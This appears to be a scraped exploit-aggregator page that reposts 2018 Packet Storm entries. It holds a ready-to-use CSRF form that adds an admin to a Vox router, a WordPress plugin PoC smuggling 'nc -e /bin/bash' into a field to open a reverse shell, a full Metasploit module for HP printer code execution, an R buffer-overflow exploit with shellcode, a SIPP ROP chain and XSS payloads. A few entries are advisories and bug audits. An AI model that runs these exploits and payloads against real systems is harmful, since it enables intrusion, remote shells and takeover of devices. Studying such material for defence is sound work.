Quantcast
Channel: Exploit Collector
Viewing all 13315 articles
Browse latest View live

Vox TG790 ADSL Router Cross Site Request Forgery

August 27, 2018, 8:17 am
$
0
0

The Vox TG790 ADSL router suffers from a cross site request forgery vulnerability.


MD5 | f1ddebc2283a2129859fcbe0f67c5378

Download
# Title: Vox TG790 ADSL Router - Cross-Site Request Forgery (Add Admin)
# Author: Cakes
# Exploit Date: 2018-08-01
# Vendor: Vox Telecom
# Link: https://www.vox.co.za/
# Firmware Version: 6.2.W.1
# CVE: N/A

# Description
# Due to improper session management low privilege users are able to create 
# administrator accounts through a crafted POST request. 

# PoC

<html>
<form action="https://TARGET/cgi/b/users/cfg/usraccedit/?be=0&l0=2&l1=9&tid=ADD_USER" method="POST">
<input type="hidden" name="0" id="0" value="10">
<input type="hidden" name="1" id="1" value="usrAccApply">
<input type="hidden" name="34" id="34" value="LulzCakes">
<input type="hidden" name="36" id="36" value="1">
<input type="text" name="33" id="33" placeholder="Account Name">
<br />
<input type="text" name="31" id="31" value="Administrator">
<br />
<input type="submit" value="W00ts">
</form>
</html>


Source:packetstormsecurity.com
Search

Textpad 8.1.2 Denial Of Service

August 27, 2018, 8:37 am
$
0
0

Textpad version 8.1.2 suffers from a denial of service vulnerability.


MD5 | c6c89bf927ec4cfdfb768d644f818330

Download
# Exploit Title:     Textpad 8.1.2 - Denial Of Service (PoC)
# Discovery by:      Shubham Singh
# Known As:          Spirited Wolf [Twitter: @Pwsecspirit]
# Youtube Channel:   www.youtube.com/c/Pentestingwithspirit 
# Discovey Date:     24-08-2018
# Homepage:          https://textpad.com
# Software Link:
# 1. For x86:        https://textpad.com/download/v81/win32/txpeng812-32.zip
# 2. For x86_64:     https://textpad.com/download/v81/x64/txpeng812-64.zip
# Tested Version:    8.1.2
# Tested on OS:      Windows 7 Ultimate 64 bit
# Steps to Reproduce:
# 1. Run the python exploit script, it will create a new file with the name "exploit.txt".
# 2. Just copy the text inside "exploit.txt" and start the program.
# 3. In the new window click "Tools"> "Run...". Now paste the content of "exploit.txt".
# 4. Into the fields:"Command". Click "OK" and you will see a crash.

#!/usr/bin/python

buffer = "A" * 300

payload = buffer
try:
    f=open("exploit.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"


Source:packetstormsecurity.com

Dojo Toolkit 1.13 Cross Site Scripting

August 27, 2018, 8:37 am
$
0
0

Dojo Toolkit version 1.13 suffers from a cross site scripting vulnerability.


MD5 | 32361799fbf94963fe405a9d518c8786

Download
Advisory ID: SYSS-2018-010
Product: Dojo Toolkit
Manufacturer: JS Foundation
Affected Version(s): 1.13
Tested Version(s): 1.13, 1.10.7
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: Medium
Solution Status: Fixed
Manufacturer Notification: 2018-07-02
Solution Date: 2018-10-13
Public Disclosure: 2018-10-24
CVE Reference: CVE-2018-15494
Author of Advisory: Moritz Bechler, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Dojo Toolkit is a JavaScript framework for building JavaScript based
applications.

The manufacturer describes the product as follows (see [1]):

"A JavaScript toolkit that saves you time and scales with your
development process.
Provides everything you need to build a Web app.
Language utilities, UI components, and more, all in one place, designed
to work together perfectly."

Due to improper escaping, applications using Dojo Toolkit may be
vulnerable to
cross-site scripting.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The inline editing feature of the dojox.grid.DataGrid component fails to
properly
escape the cell value when using it as the input field's value attribute
while
editing is activated by clicking.

> formatEditing: function(inDatum, inRowIndex){
>     this.needFormatNode(inDatum, inRowIndex);
>     return '<input class="dojoxGridInput" type="text" value="' +
inDatum + '">';
> },


That allows additional element attributes to be introduced, including an
"onfocus"
handler that will immediately get executed when editing mode is activated.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof-of-Concept (PoC):


Demo website with Dojo's dojox.grid.DataGrid component:

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<style type="text/css">
    @import
"https://ajax.googleapis.com/ajax/libs/dojo/1.13.0/dojox/grid/resources/Grid.css";
    html, body {
        width: 100%; height: 100%;
    }
</style>
</head>
<body>
<script type="text/javascript"
src="https://ajax.googleapis.com/ajax/libs/dojo/1.13.0/dojo/dojo.js"></script>
<script type="text/javascript">
    dojo.require("dojox.grid.DataGrid");
    dojo.require("dojo.data.ItemFileWriteStore");

    dojo.addOnLoad(function(){
      var g = new dojox.grid.DataGrid({
          store: new dojo.data.ItemFileWriteStore({
            data: {"items" : [ {"foo" : 'bar" onfocus="alert(1)"'} ] }
          }),
          structure: [
            { field: 'foo', width : '100%', editable: true }
          ]
      });
      dojo.byId("container").appendChild(g.domNode);
      g.startup();
    });
</script>
<div id="container" style="width: 100%; height: 100%;"></div>
</body>
</html>

When clicking the table row to start editing, the cell value is inserted
into a
text input's value attribute without proper escaping, resulting in
markup like

<input class="dojoxGridInput" value="bar" onfocus="alert(1)""=""
type="text">

which introduces JavaScript code in the "onfocus" handler that gets
immediately
executed.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update to version 1.14 of Dojo Toolkit.

More Information:

Vendor announcement: https://dojotoolkit.org/blog/dojo-1-14-released

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2018-06-04: Vulnerability discovered
2018-07-02: Vulnerability reported to manufacturer
2018-10-13: Patch released by manufacturer
2018-10-24: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Dojo Toolkit
    https://dojotoolkit.org/
[2] SySS Security Advisory SYSS-2018-010

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-010.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Bechler of SySS GmbH.

E-Mail: moritz.bechler@syss.de
Public Key: ://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Bechler.asc
Key ID: 0x768EFE2BB3E53DDA
Key Fingerprint: 2C8F F101 9D77 BDE6 465E  CCC2 768E FE2B B3E5 3DDA

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en



Source:packetstormsecurity.com

WordPress Plainview Activity Monitor 20161228 Command Injection

August 27, 2018, 8:38 am
$
0
0

WordPress Plainview Activity Monitor plugin version 20161228 suffers from an OS command injection vulnerability.


MD5 | 4b0209792ced09d52b809e31313be32c

Download
About:
===========
Component: Plainview Activity Monitor (Wordpress plugin)
Vulnerable version: 20161228 and possibly prior
Fixed version: 20180826
CVE-ID: CVE-2018-15877
CWE-ID: CWE-78
Author:
- LydA(c)ric Lefebvre (https://www.linkedin.com/in/lydericlefebvre)

Timeline:
===========
- 2018/08/25: Vulnerability found
- 2018/08/25: CVE-ID request
- 2018/08/26: Reported to developer
- 2018/08/26: Fixed version
- 2018/08/26: Advisory published on GitHub
- 2018/08/26: Advisory sent to bugtraq mailing list

Description:
===========
Plainview Activity Monitor Wordpress plugin is vulnerable to OS
command injection which allows an attacker to remotely execute
commands on underlying system. Application passes unsafe user supplied
data to ip parameter into activities_overview.php.
Privileges are required in order to exploit this vulnerability, but
this plugin version is also vulnerable to CSRF attack and Reflected
XSS. Combined, these three vulnerabilities can lead to Remote Command
Execution just with an admin click on a malicious link.

References:
===========
https://github.com/aas-n/CVE/blob/master/CVE-2018-15877/

PoC:

<html>
<!--  Wordpress Plainview Activity Monitor RCE
        [+] Version: 20161228 and possibly prior
        [+] Description: Combine OS Commanding and CSRF to get reverse shell
        [+] Author: LydA(c)ric LEFEBVRE
        [+] CVE-ID: CVE-2018-15877
        [+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell
        [+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well
  -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
<input type="hidden" name="ip" value="google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash" />
<input type="hidden" name="lookup" value="Lookup" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


Source:packetstormsecurity.com

HP Jetdirect Path Traversal Arbitrary Code Execution

August 27, 2018, 8:39 am
$
0
0

This Metasploit module exploits a path traversal via Jetdirect to gain arbitrary code execution by writing a shell script that is loaded on startup to /etc/profile.d. Then, the printer is restarted using SNMP. A large amount of printers are impacted.


MD5 | 330fb84840e2b0a7602e2d3e4c2701b5

Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require "rex/proto/pjl"

class MetasploitModule < Msf::Exploit::Remote

  Rank = NormalRanking

  include Msf::Exploit::Remote::SNMPClient
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
'Name'           => 'HP Jetdirect Path Traversal Arbitrary Code Execution',
'Description'    => %q{
        The module exploits a path traversal via Jetdirect to gain arbitrary code execution by
        writing a shell script that is loaded on startup to /etc/profile.d. Then, the printer
        is restarted using SNMP. Impacted printers:
        HP PageWide Managed MFP P57750dw
        HP PageWide Managed P55250dw
        HP PageWide Pro MFP 577z
        HP PageWide Pro 552dw
        HP PageWide Pro MFP 577dw
        HP PageWide Pro MFP 477dw
        HP PageWide Pro 452dw
        HP PageWide Pro MFP 477dn
        HP PageWide Pro 452dn
        HP PageWide MFP 377dw
        HP PageWide 352dw
        HP OfficeJet Pro 8730 All-in-One Printer
        HP OfficeJet Pro 8740 All-in-One Printer
        HP OfficeJet Pro 8210 Printer
        HP OfficeJet Pro 8216 Printer
        HP OfficeJet Pro 8218 Printer

        Please read the module documentation regarding the possibility for leaving an
        unauthenticated telnetd service running as a side effect of this exploit.
      },
'Author'         => [
'Jacob Baines', # Python PoC
'Matthew Kienow <matthew_kienow[AT]rapid7.com>', # Metasploit module
       ],
'License'        => MSF_LICENSE,
'References'     =>
        [
          [ 'CVE', '2017-2741' ],
          [ 'URL', 'https://support.hp.com/lt-en/document/c05462914' ],
          [ 'URL', 'http://tenable.com/blog/rooting-a-printer-from-security-bulletin-to-remote-code-execution' ]
        ],
'Targets'        => [
        ['Unix (In-Memory)',
'Platform'   => 'unix',
'Arch'       => ARCH_CMD,
'Payload'    => {
'Compat' => {
'PayloadType' => 'cmd'
            }
          },
        ]
      ],
'Privileged'     => true,
'DisclosureDate' => 'Apr 05 2017',
'DefaultTarget'  => 0,
'DefaultOptions' => {
'PAYLOAD'  => 'cmd/unix/bind_busybox_telnetd',
'WfsDelay' => 180
      }
    ))

    register_options(
      [
        Opt::RPORT(Rex::Proto::PJL::DEFAULT_PORT),
        OptPort.new('SNMPPORT', [true, 'The SNMP port', 161])
      ]
    )
  end

  def execute_command(cmd, opts = {})
    rpath = '0:/../../rw/var/etc/profile.d/'
    stager_script_name = opts[:stager_script_name]
    cmd = "(cd / && #{cmd}); rm -f /etc/profile.d/#{stager_script_name}"

    begin
      # use PJL to write command stager
      print_status("Connecting to port #{rport}...")

      pjl = Rex::Proto::PJL::Client.new(sock)
      pjl.begin_job

      pjl.fsinit(rpath[0..1])

      print_status("Attempting to write command stager...")
      rpath = "#{rpath}#{stager_script_name}"
      if pjl.fsdownload(cmd, rpath, is_file: false)
        print_good("Successfully wrote command stager to #{rpath}")
      else
        print_error("Failed to write command stager to #{rpath}")
        return
      end

      # verify command stager exists
      unless pjl.fsquery(rpath)
        print_error("Command stager does not exist at #{rpath}; aborting...")
        return
      end

      pjl.end_job

    rescue Rex::ConnectionError
      print_error("Connection Refused")
      raise
    end
  end

  def restart_printer
    pjl_port = datastore['RPORT']
    snmp_port = datastore['SNMPPORT']
    community = datastore['COMMUNITY']
    # Printer MIB prtGeneralReset object identifier (numeric notation)
    prt_general_reset = '1.3.6.1.2.1.43.5.1.1.3.1'
    # prtGeneralReset powerCycleReset(4) value
    power_cycle_reset = 4

    begin
      # TODO: Update when there is a clean approach to using two or more mixins that both use RPORT.
      datastore['RPORT'] = snmp_port
      print_status("Connecting to SNMP port #{rport}...")
      snmp = connect_snmp

      # get value of Printer MIB prtGeneralReset
      reset_value = snmp.get_value(prt_general_reset)
      reset_value = "''" if reset_value.is_a?(SNMP::Null)
      print_status("Initial value of prtGeneralReset OID #{prt_general_reset} => #{reset_value}")

      # set value of Printer MIB prtGeneralReset to powerCycleReset(4)
      print_status("Attempting to restart printer via SNMP...")
      varbind = SNMP::VarBind.new(prt_general_reset, SNMP::Integer.new(power_cycle_reset))
      response = snmp.set(varbind)

      if response.error_status == :noError
        print_status("Set prtGeneralReset OID #{prt_general_reset} => #{power_cycle_reset}")

        # get value of Printer MIB prtGeneralReset
        reset_value = snmp.get_value(prt_general_reset)
        reset_value = "''" if reset_value.is_a?(SNMP::Null)
        print_status("Current value of prtGeneralReset OID #{prt_general_reset} => #{reset_value}")
        print_status("Printer restarting...")

      else
        print_error("Unable to set prtGeneralReset; SNMP response error status: #{response.error_status}")
      end

    rescue SNMP::RequestTimeout
      print_error("SNMP request timeout with community '#{community}'")
      raise
    rescue SNMP::UnsupportedVersion
      print_error("Unsupported SNMP version specified; use '1' or '2c'")
      raise
    rescue Rex::ConnectionError
      print_error("Connection Refused")
      raise
    ensure
      # restore original rport value
      datastore['RPORT'] = pjl_port
    end
  end

  def exploit
    begin
      opts = {
        stager_script_name: "#{Rex::Text.rand_text_alpha(8)}.sh"
      }

      print_status("Exploiting...")
      connect
      if target.name =~ /Unix/
        execute_command(payload.encoded, opts)
      else
        execute_cmdstager(opts)
      end
      restart_printer

      return
    ensure
      disconnect
    end
  end

end

Source:packetstormsecurity.com

SQLMAP - Automatic SQL Injection Tool 1.2.8

August 27, 2018, 10:10 am
$
0
0

sqlmap is an open source command-line automatic SQL injection tool. Its goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user's specified DBMS tables/columns, run his own SQL statement, read or write either text or binary files on the file system, execute arbitrary commands on the operating system, establish an out-of-band stateful connection between the attacker box and the database server via Metasploit payload stager, database stored procedure buffer overflow exploitation or SMB relay attack and more.


MD5 | f8172574e6c94b3c3fdce9988fe1d65e

Download

Source:packetstormsecurity.com

CMS ISWEB 3.5.3 Cross Site Scripting

August 28, 2018, 9:27 am
$
0
0

CMS ISWEB version 3.5.3 suffers from a cross site scripting vulnerability.


MD5 | b146bc506b19d35f6ffdf73dbaf37bb2

Download
CMS ISWEB 3.5.3 XSS Reflected

> CVE

CVE-2018-15562

> Parameter vuln:

ordineRis,
sezioneRicerca
oggettiRicerca

> PoC Prints: https://i.imgur.com/5YpESoC.png

> Vendor of Product
http://www.isweb.it


> Attack Type
Remote

> Attack Vectors
Payload:"><svg/onload=alert(String.fromCharCode(88,83,83))>
URL: http://www.isweb.it/index.php?azione=cerca&id_sezione=505&ordineRis=default&sezioneRicerca=505&oggettiRicerca="><svg/onload=alert(String.fromCharCode(88,83,83))>

> Discoverer
Offensive0Labs - Thiago "thxsena" Sena & Rafael Fontes Souza



Source:packetstormsecurity.com

Dropbox 54.5.90 DLL Hijacking

August 28, 2018, 9:28 am
$
0
0

Dropbox version 54.5.90 suffers from a DLL hijacking vulnerability.


MD5 | 39386c09e461da242310b863097ceab4

Download
Document Title:
===============
Dropbox 54.4.90 - Multiples DLL Injection/Code Execution


Date of Discovery:
==================
2018-08-24


Exploitation Technique:
=======================
Local


Platfom Tested:
===============
Windows 10


Technical Details & Description:
================================
A local dll injection vulnerability has been discovered in the official Dropbox v54.4.90 software.

The dll vulnerability can be exploited by local attackers with restricted system user account and without user interaction.


Vulnerable Software:
[+] Dropbox


Vulnerable Version(s):
[+] 54.4.90


Affected Libraries:
[+] cryptbase.dll
[+] CRYPTSP.dll
[+] msimg32.dll
[+] netapi32.dll


Proof of Concept (PoC):
=======================
A Local DLL Loading vulnerability that could allow an unauthenticated remote attacker to manipulate a specific  DLL and
execute arbitrary code on an affected system without the user's knowledge. Example (trojan horse or a ransonmware)
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.


Manual steps to reproduce the local vulnerability ...
1. Compile dll
2. Rename the dynamic link library above
3. copy the name of dll above to C:\Program Files\Dropbox\Client\Dropbox.exe
4. Launch Dropbox.exe
5. Now the calculator executes!


-- PoC Exploit --
#include <windows.h>
#define DLLIMPORT __declspec (dllexport)

DLLIMPORT void HrCreateConverter() { evil(); }

int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}


# Disclaimer:
===============

Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the
author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related
information or exploits by the author or elsewhere.



                                    Copyright A(c) 2018 | ZwX - Security Researcher (Software & web application)


Source:packetstormsecurity.com
Search

R 3.4.4 Bufer Overflow

August 28, 2018, 9:29 am
$
0
0

R version 3.4.4 SEH buffer overflow exploit.


MD5 | 1db1952acecc95124cd66f842bf3baa1

Download
#--------------------------------------------------------#
#Exploit Title: R v3.4.4 - (SEH) Buffer Overflow Exploit
#Exploit Author : ZwX
#Exploit Date: 2018-08-22
#Vendor Homepage : https://www.r-project.org/
#Tested on OS: Windows 7
#Social: twitter.com/ZwX2a
#contact: msk4@live.fr
#Website: http://zwx-pentester.fr/
#--------------------------------------------------------#


#Technical Details & Description:
#================================
'''A local buffer overflow vulnerability has been discovered in the official R v3.4.4 software.
The vulnerability allows local attackers to overwrite the registers (example eip) to compromise the local software process.
The issue can be exploited by local attackers with system privileges to compromise the affected local computer system.
The vulnerability is marked as classic buffer overflow issue'''


# Manual steps to reproduce the vulnerability: under GUI preferences
# paste bo.txt contents into 'Language for menus and messages' click ok --> Now the calculator executes!


#!/usr/bin/python

from struct import pack
buffer = "x41" * 900
a = "\xeb\x14\x90\x90"
b = pack("<I",0x6cb85492)  #pop esi # pop ebp # ret 04 |  {PAGE_EXECUTE_READ} [R.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.4.4 (C:Program FilesRR-3.4.4bini386R.dll)
calc=("\xdb\xd7\xd9\x74\x24\xf4\xb8\x79\xc4\x64\xb7\x33\xc9\xb1\x38"
"\x5d\x83\xc5\x04\x31\x45\x13\x03\x3c\xd7\x86\x42\x42\x3f\xcf"
"\xad\xba\xc0\xb0\x24\x5f\xf1\xe2\x53\x14\xa0\x32\x17\x78\x49"
"\xb8\x75\x68\xda\xcc\x51\x9f\x6b\x7a\x84\xae\x6c\x4a\x08\x7c"
"\xae\xcc\xf4\x7e\xe3\x2e\xc4\xb1\xf6\x2f\x01\xaf\xf9\x62\xda"
"\xa4\xa8\x92\x6f\xf8\x70\x92\xbf\x77\xc8\xec\xba\x47\xbd\x46"
"\xc4\x97\x6e\xdc\x8e\x0f\x04\xba\x2e\x2e\xc9\xd8\x13\x79\x66"
"\x2a\xe7\x78\xae\x62\x08\x4b\x8e\x29\x37\x64\x03\x33\x7f\x42"
"\xfc\x46\x8b\xb1\x81\x50\x48\xc8\x5d\xd4\x4d\x6a\x15\x4e\xb6"
"\x8b\xfa\x09\x3d\x87\xb7\x5e\x19\x8b\x46\xb2\x11\xb7\xc3\x35"
"\xf6\x3e\x97\x11\xd2\x1b\x43\x3b\x43\xc1\x22\x44\x93\xad\x9b"
"\xe0\xdf\x5f\xcf\x93\xbd\x35\x0e\x11\xb8\x70\x10\x29\xc3\xd2"
"\x79\x18\x48\xbd\xfe\xa5\x9b\xfa\xf1\xef\x86\xaa\x99\xa9\x52"
"\xef\xc7\x49\x89\x33\xfe\xc9\x38\xcb\x05\xd1\x48\xce\x42\x55"
"\xa0\xa2\xdb\x30\xc6\x11\xdb\x10\xa5\xaf\x7f\xcc\x43\xa1\x1b"
"\x9d\xe4\x4e\xb8\x32\x72\xc3\x34\xd0\xe9\x10\x87\x46\x91\x37"
"\x8b\x15\x7b\xd2\x2b\xbf\x83")
nops = "\x90" * 20

poc = buffer + a + b + nops + calc
file = open("bo.txt","w")
file.write(poc)
file.close()

print "POC Created by ZwX"


#Solution - Fix & Patch:
#=======================
'''The solution could be to restrict and filter the number of characters on input of 'Language for menus and messages''''


# Disclaimer:
#===============

'''Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the
author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related
information or exploits by the author or elsewhere.



                                    Copyright A(c) 2018 | ZwX - Security Researcher (Software & web application)'''




Source:packetstormsecurity.com

Microsoft Windows JScript RegExp.lastIndex Use-After-Free

August 28, 2018, 9:30 am
$
0
0

There is a use-after-free vulnerability in jscript.dll related to how the lastIndex property of a RegExp object is handled. This vulnerability can be exploited through Internet Explorer or potentially through WPAD over local network. The vulnerability has been reproduced on multiple Windows versions with the most recent patches applied.


MD5 | b2cf3dec9e5bd796bccbeb593fafdabd

Download

Source:packetstormsecurity.com

Wayland wl_connection_demarshal() Out-Of-Bounds Memory Access

August 28, 2018, 9:30 am
$
0
0

Wayland suffers from an out-of-bounds memory access vulnerability in wl_connection_demarshal() on 32-bit systems.


MD5 | d6df3a560088b2c39f11b2f8dc3a2c2d

Download
Wayland: out-of-bounds memory access in wl_connection_demarshal() on 32-bit systems 




In wl_connection_demarshal(), incoming strings are parsed as follows:

        // audit note: `length` is a u32
        // audit note: `p` points to raw incoming u32
        length = *p++;

        if (length == 0) {
                closure->args[i].s = NULL;
                break;
        }

        // audit note: DIV_ROUNDUP overflows on 32-bit systems
        next = p + DIV_ROUNDUP(length, sizeof *p);
        // audit note: UB, comparing OOB pointer
        if (next > end) {
                wl_log("message too short, "
"object (%d), message %s(%s)\n",
                       closure->sender_id, message->name,
                       message->signature);
                errno = EINVAL;
                goto err;
        }

        s = (char *) p;

        // audit note: `length > 0` is superfluous, already checked for that above
        if (length > 0 && s[length - 1] != '\0') {
                wl_log("string not nul-terminated, "
"message %s(%s)\n",
                       message->name, message->signature);
                errno = EINVAL;
                goto err;
        }

        closure->args[i].s = s;
        p = next;
        break;

In C, in theory, computing an out-of-bounds pointer causes undefined behavior. In practice, what usually happens is that the code behaves as expected as long as the pointer computation doesn't overflow. When the pointer computation does overflow, the pointer wraps around, and you end up comparing a pointer that is smaller than the start of the allocation to the end of the allocation. This means that on a 32-bit system, when this code receives a sufficiently big 32-bit integer as length, the "next > end" check won't trigger, and an out-of-bounds access results at "s[length - 1] != '\0'".

To test this, I compiled a copy of the wayland library with the following patch that causes it to send malformed data, to be injected into the client:

diff --git a/src/connection.c b/src/connection.c
index 294c521..c84ad86 100644
--- a/src/connection.c
+++ b/src/connection.c
@@ -1137,7 +1137,7 @@ serialize_closure(struct wl_closure *closure, uint32_t *buffer,
                        }

                        size = strlen(closure->args[i].s) + 1;
-                       *p++ = size;
+                       *p++ = (size | 0x80000000);

                        if (p + DIV_ROUNDUP(size, sizeof *p) > end)
                                goto overflow;

Then I launched weston (compiled with ASAN), opened a terminal in weston, and ran the following command to run a weston-terminal using the modified wayland library:

LD_LIBRARY_PATH=/home/user/BADWAYLAND/wayland/.libs /home/user/install/bin/weston-terminal

This causes weston to die with the following crash:

ASAN:DEADLYSIGNAL
=================================================================
==26785==ERROR: AddressSanitizer: SEGV on unknown address 0x264a6d09 (pc 0xb70ef8f4 bp 0xbfc08528 sp 0xbfc083f0 T0)
    #0 0xb70ef8f3 in wl_connection_demarshal src/connection.c:749
    #1 0xb70e168a in wl_client_connection_data src/wayland-server.c:398
    #2 0xb70e9427 in wl_event_source_fd_dispatch src/event-loop.c:95
    #3 0xb70eb2d2 in wl_event_loop_dispatch src/event-loop.c:641
    #4 0xb70e47c4 in wl_display_run src/wayland-server.c:1260
    #5 0x47d559 in main compositor/main.c:2582
    #6 0xb6d94285 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18285)
    #7 0x4724c0  (/home/user/install/bin/weston+0x54c0)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/connection.c:749 in wl_connection_demarshal
==26785==ABORTING
child 26790 exited

I recommend comparing lengths instead of comparing pointers for checks like this one.


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.




Found by: jannh


Source:packetstormsecurity.com

Electron WebPreferences Remote Code Execution

August 28, 2018, 9:31 am
$
0
0

Electron WebPreferences suffers from a remote code execution vulnerability. Versions affected include 3.0.0-beta.6, 2.0.7, 1.8.7, and 1.7.15.


MD5 | b97fd525f5d8575e62b770c0373ee541

Download

Source:packetstormsecurity.com

Microsoft Windows ALPC Local Privilege Escalation

August 28, 2018, 9:31 am

SIPP 3.3 Stack-Based Overflow

August 28, 2018, 9:33 am
$
0
0

SIPP version 3.3 is prone to a local unauthenticated stack-based overflow vulnerability.


MD5 | 5459f811bc8d030cf2944fee6f093f97

Download
# Exploit Author: Juan Sacco <jsacco@exploitpack.com> - http://exploitpack.com
#
# Tested on: Kali i686 GNU/Linux
#
# Description: SIPP 3.3 is prone to a local unauthenticated stack-based overflow
# The vulnerability is due to an unproper filter of user supplied
input while reading
# the configuration file and parsing the malicious crafted value.
#
# Program: SIPP 3.3 Traffic generator for the SIP protocol
# SIPp is a free Open Source test tool / traffic generator
# for the SIP protocol. Filename: pool/main/s/sipp/sipp_3.3-1kali2_i386.deb
#
# Vendor: http://sipp.sourceforge.net/
# gdb-peda$ checksec
# CANARY    : disabled
# FORTIFY   : disabled
# NX        : ENABLED
# PIE       : ENABLED
# RELRO     : Partial
#
#[----------------------------------registers-----------------------------------]
# EAX: 0x41414141 ('AAAA')
# EBX: 0x25 ('%')
# ECX: 0xb7c9e340 --> 0x4cf8b0 ('A'<repeats 200 times>...)
# EDX: 0xb7c9e200 --> 0x0
# ESI: 0xb7ca0748 --> 0x0
# EDI: 0x0
# EBP: 0xbfffc898 --> 0xbfffc8c8 --> 0xbfffc8e8 --> 0xbfffc908 -->
0xb7c9d000 --> 0x1d4d6c
# ESP: 0xbfffc898 --> 0xbfffc8c8 --> 0xbfffc8e8 --> 0xbfffc908 -->
0xb7c9d000 --> 0x1d4d6c
# EIP: 0x43cdcf (mov    eax,DWORD PTR [eax+0xc])
# EFLAGS: 0x10216 (carry PARITY ADJUST zero sign trap INTERRUPT
direction overflow)
# [-------------------------------------code-------------------------------------]
#   0x43cdc2: call   0x4053e6
#   0x43cdc7: add    eax,0x50239
#   0x43cdcc: mov    eax,DWORD PTR [ebp+0x8]
# => 0x43cdcf: mov    eax,DWORD PTR [eax+0xc]
#   0x43cdd2: pop    ebp
#   0x43cdd3: ret
#   0x43cdd4: push   ebp
#   0x43cdd5: mov    ebp,esp
# [------------------------------------stack-------------------------------------]
# 0000| 0xbfffc898 --> 0xbfffc8c8 --> 0xbfffc8e8 --> 0xbfffc908 -->
0xb7c9d000 --> 0x1d4d6c
# 0004| 0xbfffc89c --> 0x43c159 (add    esp,0x10)
# 0008| 0xbfffc8a0 ("AAAA\377\377\377\377\310\310\377\277C\301C")
# 0012| 0xbfffc8a4 --> 0xffffffff
# 0016| 0xbfffc8a8 --> 0xbfffc8c8 --> 0xbfffc8e8 --> 0xbfffc908 -->
0xb7c9d000 --> 0x1d4d6c
# 0020| 0xbfffc8ac --> 0x43c143 (add    eax,0x50ebd)
# 0024| 0xbfffc8b0 --> 0x597ba0 --> 0x0
# 0028| 0xbfffc8b4 --> 0xffffffff
# [------------------------------------------------------------------------------]
# Legend: code, data, rodata, value
# Stopped reason: SIGSEGV
# 0x41414141 in ?? ()

import os, subprocess
from struct import pack

# rop execve ( bin/sh )
rop = "A"*2208 # junk
rop += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop edi
; pop ebp ; ret
rop += pack('<I', 0x0811abe0) # @ .data
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x0807b744) # pop eax ; ret
rop += '/bin'
rop += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop ebx ;
pop ebp ; ret
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; popedi ;
pop ebp ; ret
